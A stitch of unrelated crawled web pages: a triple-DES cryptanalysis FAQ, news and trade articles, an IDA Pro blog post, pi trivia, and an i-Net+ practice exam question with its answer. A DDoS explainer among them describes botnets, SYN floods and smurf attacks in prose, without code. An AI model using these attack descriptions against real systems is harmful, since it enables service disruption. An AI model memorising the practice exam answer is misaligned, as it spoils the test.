- 7.4 What is a designated confirmer signature?
- 7.5 What is a fail-stop signature scheme?
- 7.6 What is a group signature?
- 7.7 What is a one-time signature scheme?
- 7.8 What is an undeniable signature scheme?
- 7.9 What are on-line/off-line signatures?
- 7.10 What is OAEP?
- 7.11 What is digital timestamping?
- 7.12 What is key recovery?
- 7.13 What are LEAFs?
- 7.14 What is PSS/PSS-R?
- 7.15 What are covert channels?
- 7.16 What are proactive security techniques?
- 7.17 What is quantum computing?
- 7.18 What is quantum cryptography?
- 7.19 What is DNA computing?
- 7.20 What are biometric techniques?
- 7.21 What is tamper-resistant hardware?
- 7.22 How are hardware devices made tamper-resistant? | <urn:uuid:40549f0a-842d-4e7e-b954-886e4e9dae31> | CC-MAIN-2017-04 | https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/what-is-oaep.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00568-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.879215 | 632 | 2.875 | 3 |
3.2.6 What is triple-DES?
For some time it has been common practice to protect information with triple-DES instead of DES. This means that the input data is, in effect, encrypted three times. There are a variety of ways of doing this; the ANSI X9.52 standard (see Question 5.3.1) defines triple-DES encryption with keys k1, k2, k3 as
C = Ek3(Dk2(Ek1(M))),
where Ek and Dk denote DES encryption and DES decryption, respectively, with the key k. This mode of encryption is sometimes referred to as DES-EDE. Another variant is DES-EEE, which consists of three consecutive encryptions. There are three keying options defined in ANSI X9.52 for DES-EDE:
- The three keys k1, k2 and k3 are independent.
- k1 and k2 are independent, but k1 = k3.
- k1 = k2 = k3.
The third option makes triple-DES backward compatible with DES.
The use of double and triple encryption does not always provide the additional security that might be expected. For example, consider the following meet-in-the-middle attack on double encryption [DH77]. We have a symmetric block cipher with key size n; let Ek(P) denote the encryption of the message P using the key k. Double encryption with two different keys gives a total key size of 2n. However, suppose that we are capable of storing Ek(P) for all keys k and a given plaintext P, and suppose further that we are given a ciphertext C such that C = Ek2(Ek1(P)) for some secret keys k1 and k2. For each key l, there is exactly one key k such that Dl(C) = Ek(P). In particular, there are exactly 2n possible keys yielding the pair (P,C), and those keys can be found in approximately O(2n) steps. With the capability of storing only 2p < 2n keys, we may modify this algorithm and find all possible keys in O(22n-p) steps.
Another example is given in [KSW96], where triple EDE encryption with three different keys is considered. Let K = (ka, kb, kc) and K¢ = (ka ÅD, kb, kc) be two secret keys, where D is a known constant and Å denotes XOR. Suppose that we are given a ciphertext C and the corresponding decryptions P and P¢ of C with the keys K and K¢, respectively. Since P¢ = Dka ÅD(Eka(P)), we can determine ka (or all possible candidates for ka) in O(2n) steps, where n is the key size. Using an attack similar to the one described above, we may determine the rest of the key (that is, kb and kc) in another O(2n) steps.
Attacks on two-key triple-DES have been proposed by Merkle and Hellman [MH81] and Van Oorschot and Wiener [VW91], but the data requirements of these attacks make them impractical. Further information on triple-DES can be obtained from various sources [Bih95] [KR96]. | <urn:uuid:75364369-17b5-4af8-8514-5e43f83a5521> | CC-MAIN-2017-04 | https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/triple-des.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00384-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.916324 | 709 | 3.875 | 4 |
'Stranger Danger!' Young people not aware of the risks when it comes to online friends, reveals national research
07 Feb 2011
As many as 43 per cent of people with internet access have online ‘friends’ they have never met in real life, according to research released today by Kaspersky Lab, Europe’s largest antivirus company. The online research, undertaken by YouGov, is being released to coincide with Safer Internet Day 2011 and highlights that over half (54%) of those aged between 18 and 24 have online friends they haven’t met in real life, identifying the possibility that young people today are sharing personal information from strangers.
This makes worrying reading when compared with the findings of a Europe-wide survey by EU Kids Online. This survey found that a lack of discrimination in online relationships risked exposing vulnerable young people to sexual messages (received by 15 per cent of 11 to 16 year olds), data misuse (experienced by nine per cent of 11 to 16 year olds) and bullying posts (received by five per cent of nine to 16 year olds, but identified as by far the most upsetting.)
With a third of nine to 16 year olds now surfing the web on a mobile device, it is imperative that new ways of protecting young people are implemented.
The YouGov survey found that parents are often unaware of what their children are looking at on their mobile phones. Around half (49 per cent) of parents with children under 18 who have internet-enabled mobile devices don’t monitor their children’s mobile web habits. With young people generally regarding their mobile phone as personal and private, for the 51 per cent of parents who do supervise their children’s mobile phone habits, there is the risk of such behaviour being seen as upsetting and invasive by their children.
Kaspersky Lab is committed to helping young people and their parents address these challenges and acquire the knowledge and tools they need to stay safe online.
“A parent instinctively wants to protect their child from harm,” said Malcolm Tuck, managing director of Kaspersky Lab UK. “That may not always be possible, but there is much we can do to minimise the danger, both in real life and in the virtual world.”
“We also believe that technology alone is not the answer, which is why our dedicated website www.kaspersky.co.uk/safer contains advice and guidance for parents, guardians and children. Protecting young people online means talking to them about the dangers and giving them the confidence and control they need to surf safely,” continued Tuck.
To learn more about the broad range of activities taking place around Safer Internet Day: Our Virtual Lives, please visit www.saferinternet.org. | <urn:uuid:a514ccb4-a27e-43a1-8266-ea2e3e71c0d5> | CC-MAIN-2017-04 | http://www.kaspersky.com/au/about/news/press/2011/_Stranger_Danger_Young_people_not_aware_of_the_risks_when_it_comes_to_online_friends_reveals_national_research | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279468.17/warc/CC-MAIN-20170116095119-00110-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.95862 | 568 | 2.703125 | 3 |
Reducing 'noise' in quantum computing is more difficult than first believed
- By William Jackson
- Apr 09, 2009
From a theoretical point of view, work on quantum computing is moving along at a good clip.
The first classical computing machines were envisioned around 1800, long before the introduction of electronics, and it took about 150 years to produce a practical computer even though the theory had long been worked out, said Bryan Eastin, an information theorist with the National Institute of Standards and Technology (NIST).
“In that respect we’re doing pretty good, in that I expect we will have [a quantum computer] in less than 100 years,” Eastin said. “There are no theoretical difficulties, but there are a lot of painful technical difficulties.”
One of those difficulties—the problem of "noise," or errors in calculations introduced by stray energy — turns out to more difficult than thought. Eastin and NIST mathematician Emanuel Knill proved in a paper in the March 20 issue of Physical Review Letters that one promising technique for squelching quantum noise actually is impossible.
The technique, called transversal encoded quantum gates, seemed simple at first (at least to a physicist). “But after substantial effort, no one was able to find a quantum code to do that,” Eastin said. “We were able to show that a way doesn’t exist.”
This is not a big setback for quantum computing, he said.
“This was not the only path for doing it,” he said. So many years had been spent trying to solve the problem that many scientists already were beginning to suspect that it could not be done. “It has already been factored in” to much of the research, he added.
Quantum computing uses subatomic particles, rather than binary bits, to carry and manipulate information. While a traditional bit is either on or off, a 1 or a 0, a quantum bit (or qubit) can exist in both states simultaneously. Once harnessed, this superposition of states should let quantum computers extract patterns from possible outputs of huge computations without performing all of them, allowing them to crack complex problems not solvable by traditional binary computers.
But noise in these computations is a problem because quantum computing does not allow bits of data to be copied for error checking, as traditional computing does. Transversal gates were supposed to solve this problem by preventing qubits that are going to be error corrected together from interacting, thus squelching the noise of errors. Similar gates have been designed for other purposes, but Eastin and Knill were able to show a mathematical proof that the structure of quantum space is not amenable to this particular technique.
With transversal gates ruled out, scientists now are free to move onto greener fields of research and come up with better solutions, Eastin said.
How close are we to practical quantum computing?
“I don’t expect there to be a quantum computer in the next 10 or even 20 years that can do things a classical computer can’t do,” Eastin said. “I may be wrong.”
The development of quantum computing has the advantage of being able to draw on experience from classical computing. At least researchers now know about the need for error correction.
Now that he has finished off transversal gates, Eastin has a number of other research irons in the fire, such as quantum discord, a measure of non-classical correlation in quantum systems.
William Jackson is a Maryland-based freelance writer. | <urn:uuid:913c472f-ad58-4030-9dc7-7e0f29669a90> | CC-MAIN-2017-04 | https://gcn.com/articles/2009/04/09/quantum-computing-noise.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280850.30/warc/CC-MAIN-20170116095120-00412-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.965975 | 748 | 3 | 3 |
Question 5) Test Yourself on CompTIA i-Net+.
SubObjective : Identify Suspicious Network Activities
Single Answer Multiple Choice
Which kind of attack is one that floods a computer with bogus TCP/IP addresses?
A. SYN flood
B. DOS flood
C. PING flood
D. Mail flood
A. SYN flood
A SYN flood is an attack targeted at TCP that, when successful, will leave computers unable to connect to network resources. A SYN flood works by sending numerous TCP synchronization (SYN) packets during the three-way handshake of establishing a session. During a three-way handshake, a computer opens a session by sending a TCP packet known as a SYN to another computer. A hacker who is SYN flooding will send numerous SYN packets.
When the targeted computer receives the SYN packet, it returns a SYN acknowledgement (ACK) packet and places the outstanding SYN ACK reply in a buffer to wait for its response. The hacker will use a bad IP address so that when the SYN ACK is returned to the original computer it will never arrive. Meanwhile, the targeted computer is still receiving SYN requests and adding their SYN ACK replies to its buffer. Once this buffer is full, the targeted system will no longer accept arriving SYN requests. In order to move a SYN ACK reply out of the buffer, the initiating computer will need to send an ACK, which completes the three-way handshake.
Eventually, the computer’s buffer fills with unanswered SYN ACK replies, and it is unable to accept any new SYN requests making it impossible for other computers to establish a session with this computer. This is an example of a denial-of-service attack. In order to find out who has initiated such an attack, you should examine the source IP address and destination IP address.
These questions are derived from the Self Test Software Practice Test for CompTIA Exam #IK0-002: i-Net+. | <urn:uuid:062e8f1e-ed60-443c-8e60-1be197baff05> | CC-MAIN-2017-04 | http://certmag.com/question-5-test-yourself-on-comptia-i-net/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281263.12/warc/CC-MAIN-20170116095121-00320-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.925242 | 415 | 2.859375 | 3 |
While the world’s greatest athletes were competing for gold at this year’s summer Olympics, some of the greatest minds in space exploration were similarly attempting a world-class achievement. On Sunday evening, NASA’s Mars Science Laboratory (MSL), also known as Curiosity, successfully landed on Mars with help from HPC resources. Yesterday, Dell announced that two clusters housed at NASA’s Jet Propulsion Laboratory (JPL) assisted with the complex landing sequence.
Galaxy and Nebula systems, each based on Dell’s PowerEdge servers, were used to analyze large amounts of data in preparation of the Curiosity’s landing sequence. Prior to the launch, the clusters were tasked with validating parameters created by the mission team. This information was then uploaded to the rover one week before its arrival.
The anticipation was nerve-wracking to say the least. This was a project that had been active since 2004 and cost $2.5 billion. The delivery method was one of a kind, as the Curiosity team had to develop unique systems to safely lands the car-sized rover on the red planet. The moment was aptly named “seven minutes of terror”.
Thankfully, the landing was successful, marking a memorable event in NASA’s history. Jere Carroll, general manager of civilian agencies at Dell Federal, spoke of the collaboration while congratulating the NASA team.
“We’re proud to work hand-in-hand with NASA, a true American institution that provides the world with the understanding that modern day pioneering delivers optimism and the drive to go further,” he said. “Most importantly, we are honored to be able to test and validate this mission’s most critical portion, landing on the Red Planet.” | <urn:uuid:e19b71fb-47c2-4505-8eb9-27e5b4f17291> | CC-MAIN-2017-04 | https://www.hpcwire.com/2012/08/07/dell_clusters_help_nasa_stick_landing_of_mars_rover/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284376.37/warc/CC-MAIN-20170116095124-00136-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.965706 | 364 | 2.8125 | 3 |
Florida is a pioneer in data collection, especially in tracking students through their academic careers. The Sunshine State deployed the most comprehensive data warehouse and student database in the country. Florida was the first, and is currently the only, state in the nation to be recognized by the Data Quality Campaign (DQC) for meeting the 10 elements necessary to build a longitudinal data system - a key indicator for meeting the requirements of the No Child Left Behind (NCLB) Act, which became a federal law in 2002.
"Florida has one of the oldest systems, and they've done an incredible job of staying on top of technology and working with state legislators to make them understand the impact and value of data so they can actually support systems and use data in decisions," said Nancy Smith, deputy director of the DQC, a nonprofit organization that aims to improve the collection and use of data in education to improve student achievement.
The DQC's goal is to help every state institute a longitudinal data system by 2009 and change data use in education. Although not required by federal law, longitudinal data systems can track student information from pre-kindergarten through postsecondary schools, giving states the ability - technologically - to meet federal data requirements.
"The federal government never tells a state and there's nothing explicitly in NCLB that says states need this longitudinal data system, but to meet their reporting requirements, you really pretty much have to," Smith said. "NCLB was definitely the impetus for a lot of states to move forward with building these student-level longitudinal data systems."
Not only do longitudinal data systems help bring states into compliance with the NCLB, these data systems can improve student achievement by informing and improving public education. Longitudinal data systems allow states and school districts to follow students' academic progress throughout their academic career, determine the effectiveness of specific schools and programs, identify high-performing schools so that educators and the public can learn from best practices, evaluate the effect of teacher preparation and training programs on student achievement, and focus school systems to a higher percentage of students to succeed in rigorous high-school courses, college and the work force, according to the DQC.
Florida has had a long history of data collection, with the Florida Legislature supportive of implementing and enhancing statewide student longitudinal data systems. Currently every legislative budget in Florida requires a certain portion of funding allocated to school districts to be used for data and information services.
Florida began collecting student-level data in 1986 through the Florida Information Resource Network. The network allowed the Florida Department of Education (FDOE) to compare student data with aggregate data collected in summary reports. In 1988, the state began managing transcripts using a computer system that, by 2001, contained more than 900,000 electronic transcripts. By 1994, Florida was using the most progressive, comprehensive and efficient systems for transferring student records in the nation, according to the DQC.
In 1998, Florida implemented the A+ Plan, which established comprehensive school assessments and demanded new levels of accountability. Under the plan, schools receive grades from A to F, which are sent home to parents, published as "report cards" on the FDOE Web site and publicized in the media.
When the plan was first implemented, the FDOE realized it would need to increase what had already been prolific data collection and management of that data. The FDOE soon garnered funding to build a data warehouse that would unify all state school level data in three years.
In 2003, the Florida K-20 educational data warehouse (EDW) was deployed as a single repository of integrated data from 26 state-level source systems. The system links data by Social Security numbers, and tracks the individual progression of students and teachers throughout their academic careers, including demographics, enrollment, course completion, assessment results, financial aid and employment.
ARMed for Organization
The Florida EDW is managed and maintained by the Division of Accountability, Research and Measurement (ARM), a "PK-20" umbrella organization covering the management of school processes and information resources from pre-kindergarten to postsecondary schools.
"(ARM), from an organizational standpoint, does a lot to coordinate things like definitions, business rules about how we coordinate data over time, how we look at things even on an annual basis, and really gives us the ability to do some things that in most states run into organizational barriers," said Jay Pfeiffer, ARM's deputy commissioner.
ARM collects and analyzes data for five organizational areas:
An important impetus for developing the EDW was the desire to consolidate state and federal reporting for Florida schools, rather than having multiple schools issue reports from multiple disparate reporting systems, Pfeiffer explained.
"We basically built our data systems around the idea that not only does it provide auditable resources for funding," he said, "but it also provides a means for Florida to do reporting for No Child Left Behind, the Carl Perkins Act and the Higher Education Act."
As the EDW became a reliable source of data integration and reporting, ARM began to notice how a data warehouse can track students' progress from education to professional careers. Tracking student performance from high school through college can assist high schools in building their curriculum to prepare students for college and the work force, and is one of the 10 requirements essential to building a longitudinal data system by the DQC.
"There began to be a pretty natural question about what happens to people over time, what kinds of things lead to student successes, what are the employment results, what are the characteristics of the educational system that make that happen, what are the best practices from a programmatic standpoint by looking at data longitudinally," Pfeiffer said.
The chief technology officer of the FDOE, Ron Lauver, played a supportive role in the technological process of Florida's data systems. He helped Florida build its longitudinal systems, including the EDW, from the ground up, choosing to use pre-existing technological foundations to build a system tailored to the state, he said.
"The approach Florida took was really important," Lauver said. "We had to do the development here, it wasn't something we could purchase, especially since we were out in front of the pack. There's nobody out there with anything, and if there is chances are things will be done substantially different."
Innovation Goes On
Florida continues its forward push for innovative educational data systems. Sunshine Connections is a five-year partnership with Microsoft to provide a Web-based portal to resources for educators, including interactive classroom management tools, student performance data, collaboration and communications with other teachers. Florida also recently implemented Choices, which offers student educational planning and goals.
It's very important to track data at the student level and share the information within the state and ideally across the state, Smith said, adding that the DQC believes that information resources can change the culture and value of education.
Although Florida might be ahead of the educational curve in many instances, education officials realize more work lies ahead.
"When you build these systems, you don't get to kick your feet back and say, 'Well, we built it, and we're done' when you've actually got something in place," Pfeiffer said. "It's constant. It never ends. The technology issues you have do deal with - assuring elected officials that what you have is for public benefit, trying to get the rust off the old techniques and technologies, and dealing with issues concerning the confidentiality of data - are daily concerns. These are not things that go away." | <urn:uuid:2300a801-3651-434d-9d2f-2bbd83e56d9f> | CC-MAIN-2017-04 | http://www.govtech.com/education/Educating-Florida.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00440-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960497 | 1,546 | 2.96875 | 3 |
When a number of systems i.e. one or more than one web server floods the resources and bandwidth of a targeted system then a distributed denial of service attack (DDoS) takes place, Different types of methods are used by attackers in order to compromise the systems.
It is the malware that can carry out the mechanisms of DDoS attack; its best example was MyDoom. The mechanism of its DoS was actually triggered on a specific time and date. The DDoS of this kind involves hardcoding of the target IP address before the release of malware and there was no need of communication for launching the attack.
It can also happen that the system may be compromised with a trojan, giving a permission to the attacker downloading a zombie agent (sometimes the trojan already contain one). Attackers can destroy the systems with the help of automated tools that exploit the faults present in programs and listen for connections from far away hosts. The primary concern of this scenario is that the systems start serving as web servers.
One of the classic examples of DDoS tool is Stacheldraht DDoS tool. A layered structure is used and the attacker make use of a client program for connecting to the handlers, and these are compromised systems that send commands to the zombie agents, which give rise to DDoS attack. The handlers can control the agents with the use of automated routines in order to exploit program’s vulnerabilities that accept the connections running far away on the targeted hosts. Every single handler has a capacity to control up to 1000 agents.
These systems compromisers are referred to as botnets. Still the DoS tools like Stacheldraht utilizes the classic method of DoS attack centered on IP spoofing as well as amplification like fraggle attacks and smurf attacks (also referred to as bandwidth consumption attacks). Sometimes the SYN floods or resource starvation attacks may be used too. For the purpose of DoS modern tools can utilize DNS servers.
The attacks like SYN floods which are actually simple, make its appearance with a big range of source IP addresses, so it seems as if it is a properly distributed DoS. For these flood attacks there is no requirement to complete the TCP three way handshake as well as there is no need of trying to exhaust the bandwidth of server. There are chances that the origination of the attack may be based on one host because the IP addresses of the source can be fake. The best way to deal SYN queue flooding is with stack enhancements like syn cookies, however, in order to exhaust the bandwidth completely involvement is required.[need more explanation]
Unlike MyDoom’s DDoS mechanism, Botnets are not like MyDoom’s DDoS mechanism because botnets can work against any IP address. It is used by script kiddies in order to make the famous websites unavailable to the legal users. If the attackers are sophisticated then they use DDoS tools for carrying out extortion – even to deal with their rivals in business
Such attacks fall in the category of DoS attack if an attacker mounts it from a single host. Actually, the attack in reaction of availability also falls in the category of Denial of Service attack. In addition, if multiple systems are used by attacker in order to launch attacks one after the another against to a far away host, this would then fall in the category of DDoS attack.
There are some major benefits that an attacker can enjoy by using a distributed denial-of-service attack: when more machines are used then more traffic can be generated, it is difficult to switch off so many attack machines as compared to one attack machine, the attack machine’s behavior becomes furtive, which makes it difficult to track as well as shut down. All the benefits that attacker enjoy can become challenging for mechanism of defense. For example, if you just purchase more incoming bandwidth as compared to the existing volume of the attack then this would not be so helpful, the reason is that the attack machines can be added by the attacker.
Sometimes the owner permits to make the machine part of a DDoS attack. One of the most popular examples of this is the DDoS attack (2010) against big credit card companies by WikiLeaks supporters. In these types of cases, the movement supporters (the ones against the arrest of WikiLeak’s founder Julian Assange) opted to download and run the software of DDoS.
If you need more about DoS and DDoS attacks, consider this: | <urn:uuid:7131f678-e268-41e9-9dd4-d55a302efdd8> | CC-MAIN-2017-04 | https://howdoesinternetwork.com/2012/ddos-distributed-denial-of-service-attack | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00256-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952866 | 911 | 3.046875 | 3 |
Another new feature that will be available in the upcoming version of IDA Pro is the ability to create and render custom data types and formats.
(Embedded instructions disassembled and rendered along side with x86 code)
What are custom types and formats
- Custom data type: A custom type is basically just a way to tag some bytes for later display with custom format, when the built-in IDA types (dt_byte, dt_word, etc) are not enough.
For example: an XMM vector, a Pascal string, a half-precision (16 bits) floating-point number, a 16:32 far pointer (fword), uleb128 number and so on.
To define a custom type, you need to provide its name, size (fixed or dynamically calculated), keyword for disassembly and a few other attributes.
- Custom data format:
The custom data format allows you do display a custom or built-in data type in any way you like. You can register several formats for each type and switch the representation.
For example, you might want to switch the display of the same 16-byte XMM vector between four floats or two doubles.
A format definition includes callback for printing (to display) and scanning (used during debugging to change the register values).
For example, here is a custom MAKE_DWORD format applied to the built-in dword type:
Its implementation is very simple:
Next we illustrate some possible usages of custom types and formats. Other uses are also possible too, it is up to your imagination.
Decoding embedded bytecodes
Imagine you are debugging an x86 program that implements its own VM and embeddes them in the program.
The classical solution for this problem can be:
- Write a dedicated processor module and then load the extracted bytecodes separately
- Or define the bytecodes as bytes and then use comments to describe the real meaning of those bytecodes.
With this new addition, one can just write a custom data type to handle the situation:
And if you happen to have a situation where the bytecodes are operands to instructions (as means of obfuscation), you can still apply the custom format on those operands:
The previous blog entry showed how to write processor modules using Python. What if one simply uses the “import” statement to import a full-blown processor module script and use it in the custom data types/formats? 😉
Displaying resource strings
When reversing MS Windows applications, one can encounter string IDs, but then how to easily and nicely go fetch the data and display it in the disassembly listing?
Normally, one would have to use a resource editor to extract the string value corresponding to the string id, then to create an enum in IDA for each string ID with a repeatable comment:
That works, but what about writing your own custom format instead:
And then applying it directly without having to use a resource editor to extract the string value, have the custom format do that programmatically for you :
This is how a resource string custom format handler can look like:
To take a closer look at it, you can download the custom data type handler script along with the source code of the simplevm assembler/disassembler and the C program that was used in this article. | <urn:uuid:a9c54aa2-2273-41c3-974a-67ec4423e73e> | CC-MAIN-2017-04 | http://www.hexblog.com/?p=117 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00100-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.844356 | 689 | 3.03125 | 3 |
Public works officials in Laurel, Md., don't like wasting money -- especially not on dumping trash that could have been recycled.
That's why the city made recycling a requirement for city residents living in single-family homes and townhouses, and encourages it at apartment complexes. That's also why its public works department recently installed radio frequency identification (RFID) tags on recycle bins to track recycling habits.
Laurel's high-tech approach is part of a pilot program in the city's Greens of Patuxent neighborhood, in which recycling crews use handheld scanners to read the tags attached on the bins and record their data. With software and technology developed by Rehrig Pacific Co., each ID tag has been linked to an address, so the city can keep track of residents who recycle and those who don't.
Typically noncompliance leads to a courtesy notice, which can then lead to citations of $25 to $100. But the city wants to avoid fines. None will be issued during the program, which the city hopes will help educate rather than penalize the public, said Michele Blair, the city's recycling coordinator.
The idea of scanning recycle bins has roots elsewhere in a program called RecycleBank, which tracks how many pounds a household recycles and offers incentives, such as coupons and discounts. Co-founded in 2005 by Ron Gonen, the program runs in more than 75 cities and in the UK.
View Full Story | <urn:uuid:6cf07dd2-1213-44b1-b25b-ed02026e5408> | CC-MAIN-2017-04 | http://www.govtech.com/e-government/RFID-Tags-on-Recycle-Bins-Help.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00551-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.964846 | 292 | 2.578125 | 3 |
Patient Safety and Electronic Health Records (EHRs)
EHRs Support Safer, Higher Quality Health Care
As early as 2001, the Institute of Medicine stated that to support safer, higher quality health care, systems of care needed to be redesigned including the use of information technology to support clinical and administrative processes.
Adverse events, or injuries caused by medical management, are the result of errors of commission (errors in dose, surgical error, etc.) and omission (avoidable delay in diagnosis, failure to act on test results, etc.). Patient data safety systems should incorporate immediate access to patient information and decision support tools while also capturing adverse events and near misses to enable the design of safer care delivery systems.
The current healthcare information infrastructure is error prone and studies demonstrate that electronic health record (EHR) users make more appropriate clinical decisions.
This slide presentation includes key capabilities of an EHR system and recommendations of the Institute of Medicine Committee on Data Standards for Patient Safety. Click "Download Whitepaper" to request the URL to this resource.
- How Does the Cybersecurity Information Sharing Act (CISA) Impact the Hospital and Healthcare Industry
EHR / EMR
- Presentation on Patient Safety: Achieving A New Standard for Care (Institute of Medicine Committee on Data Standards for Patient Safety November, 2003)
- The JCAHO Patient Safety Event - Taxonomy: A Standardized Terminology and Classification Schema for Near Misses and Adverse Events | <urn:uuid:25719201-ad32-4fe0-b7ff-836c7085a7dd> | CC-MAIN-2017-04 | https://www.givainc.com/healthcare/patient-safety-ehr-adverse-events.cfm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00119-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.880123 | 302 | 2.625 | 3 |
That's right, March 14 is international Pi Day. Get it -- pi is 3.14, and March 14 is 3/14?
Most everyone knows pi -- the ratio of the circumference of a circle to its diameter. But how much do you really know about this magical number? Below are 28 fun facts about pi split up into tidy categories. Enjoy!
[ MORE PI DAY: 10 Awesome ways to celebrate Pi Day 2013
EVEN MORE PI DAY: 10 More ways to celebrate Pi Day ]
Pi in society
-Pi Day is also Albert Einstein's birthday, along with the birthdays of Apollo 8 Commander Frank Borman, Astronomer Giovanni Schiaparelli, and last-man-on-the-moon Gene Cernan.
-There is a pi cologne.*
-Computing pi is a stress test for a computer -- a kind of "digital cardiogram.*
-The record for calculating pi, as of 2010, is to 5 trillion digits (source: Gizmodo).
Random pi information
- If you were to print 1 billion decimal values of pi in ordinary font it would stretch from New York City to Kansas (source: Buzzle).
- 3.14 backwards looks like PIE.
- "I prefer pi" is a palindrome.
-If you divide the circumference of the sun by its diameter, what will you have? Pi in the sky! (source: Jokes4us.com)
- What do you get if you divide the circumference of a jack-o'-lantern by its diameter? Pumpkin pi! (source: Jokes4us.com)
Pi in movies and TV
-There's a reference to Pi in "Star Trek." Check it out here.*
-Many movies have been made about pi, including "Pi: Faith in Chaos," which is about a man who goes mad trying to rationalize pi.*
-Other movie references to pi include pi being the secret code in Alfred Hitchcock's "Tom Curtain" and "The Net" with Sandra Bullock.*
-In the book "Contact" by Carl Sagan, humans study pi to gain awareness about the universe.*
-The first million decimal places of pi consist of 99,959 zeros, 99,758 ones, 100,026 twos, 100,229 threes, 100,230 fours, 100,359 fives, 99,548 sixes, 99,800 sevens, 99,985 eights and 100,106 nines.*
-There are no occurrences of the sequence 123456 in the first million digits of pi -- but of the eight 12345s that do occur, three are followed by another 5. The sequence 012345 occurs twice and, in both cases, it is followed by another 5.*
-The first six digits of pi (314159) appear in order at least six times among the first 10 million decimal places of pi.*
-At position 763 there are six nines in a row, which is known as the Feynman Point.^
Pi the number
-The fraction 22/7 is a well-used number for Pi. It is accurate to 0.04025%.^
-Another fraction used as an approximation to Pi is (355/113), which is accurate to 0.00000849%.^
-A more accurate fraction of Pi is (104348/33215). This is accurate to 0.00000001056%.^
-The square root of 9.869604401 is approximately Pi.^
The symbol pi
-In the Greek alphabet, pi (piwas) is the 16th letter. In the English alphabet, p is also the 16th letter.*
There are pi haters
-Check out this slideshow of ways to celebrate Tau Day, an alternative calculation to Pi Day.
-Around 2000 B.C., Babylonians established the constant circle ratio as 3 1/8 or 3.125. The ancient Egyptians arrived at a slightly different value of 3 1/7 or 3.143.*
-One of the earliest known records of pi was written by an Egyptian scribe named Ahmes (c. 1650 B.C.) on what is now known as the Rhind Papyrus. He was off by less than 1% of the modern approximation of pi (3.141592).*
-Plato (427-348 B.C.) supposedly obtained for his day a fairly accurate value for pi:
This story, "28 Facts About Pi That You Probably Didn't Know" was originally published by Network World. | <urn:uuid:0bf9b431-64b8-48f9-b596-e7747056a9e5> | CC-MAIN-2017-04 | http://www.cio.com/article/2387553/hardware/28-facts-about-pi-that-you-probably-didn-t-know.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283301.73/warc/CC-MAIN-20170116095123-00027-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.92399 | 950 | 2.984375 | 3 |
In 2003, the total quantity of desalinated water used was 102.4 million cubic meter against 44.1 million cubic meters in the year 1991. In 2005, treated wastewater amounted to about 62 million cubic meters per year of the wastewater (secondary treatment) against the 45 million cubic meters in 1991.Despite the 100% increase compared to the year 1991, only 16.3 million cubic meters per year received a tertiary treatment and a part was used for irrigation purposes in government farms and some private farms. The rest of the water was discharged into the sea. The tertiary treated water constitutes chemical and hygienic properties that are within the international limits and are considered good for agricultural purposes. The government has plans to fully utilize the Treated Sewage Effluent (TSE) water through major agricultural projects; however, constant delays and lack of funds for these projects have greatly restricted its usage. As of 2015, the desalination market in Bahrain was worth USD X.X billion. The market size is expected to grow at a CAGR of XX.XX%.
The depleting natural precipitation and ground-water levels and increasing population are the major drivers of the sector in the region. A continued effort at increasing diversification of government income from hydrocarbons is another factor that has led to an increase in construction projects, industries, manufacturing plants, etc., leading to more demand for fresh water. Moreover, the government is supporting and encouraging the establishment of desalination plants to meet the nation’s demands.
Restraints and Challenges
The biggest challenge of desalination is the cost. As per a study, the cost of desalinated water per meter cube was USD 1.04, 0.95 and 0.82 for MSF, MED, and RO, assuming a fuel cost of USD 1.5/ GJ. Moreover, energy accounts for approximately three-fourths of the supply cost of desalination. Transportation cost is also added to the overall cost, making desalination a very costly process. Another negative impact of desalination is on the environment with the treatment of brackish water leading to pollution of fresh water resources and soil. Discharge of salt on coastal or marine ecosystems also has a negative impact.
Bahrain’s government intends to make desalination the source of 100% public potable water supply. The government has upgraded the four existing plants and their capacities. Moreover, it is inviting more and more foreign investments in the region to keep up with the domestic needs that are continuously on the rise due to an increase in the number of construction projects, manufacturing industries, etc.
About the Market | <urn:uuid:75182b69-b212-4a27-b99f-efe0f5f9a234> | CC-MAIN-2017-04 | https://www.mordorintelligence.com/industry-reports/desalination-industries-in-bahrain-industry | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00331-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.955808 | 539 | 2.9375 | 3 |
Imagine driving on a road paved not with asphalt but with glass. And within this glass are photovoltaic cells that transform sunlight into electricity and send it directly to the homes lining the street. That’s the aim of an Idaho-based company called Solar Roadways. And before you dismiss the notion as impossible, you might be astonished to know that the company has federal funding and is currently leading the GE Ecomagination Powering Your Home Challenge, a program that promotes energy innovation.
